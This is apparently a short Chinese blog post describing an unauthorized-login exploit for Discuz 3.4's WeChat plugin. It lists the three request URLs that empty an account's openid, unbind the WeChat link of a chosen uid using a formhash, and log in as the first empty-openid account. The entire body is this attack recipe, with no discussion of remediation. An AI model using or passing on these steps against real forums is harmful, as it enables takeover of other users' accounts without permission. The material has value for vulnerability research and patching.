# Discuz3.4越權登錄漏洞
==漏洞利用==
通過/plugin.php?id=wechat:wechat&ac=wxregister&username={name}這種方式可以使openid為空, 但註冊的是一個新的賬號。
解除指定uid綁定的微信:
/plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={formhash}
登陸第一個openid為空的賬號:/plugin.php?id=wechat:wechat&ac=wxregister
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容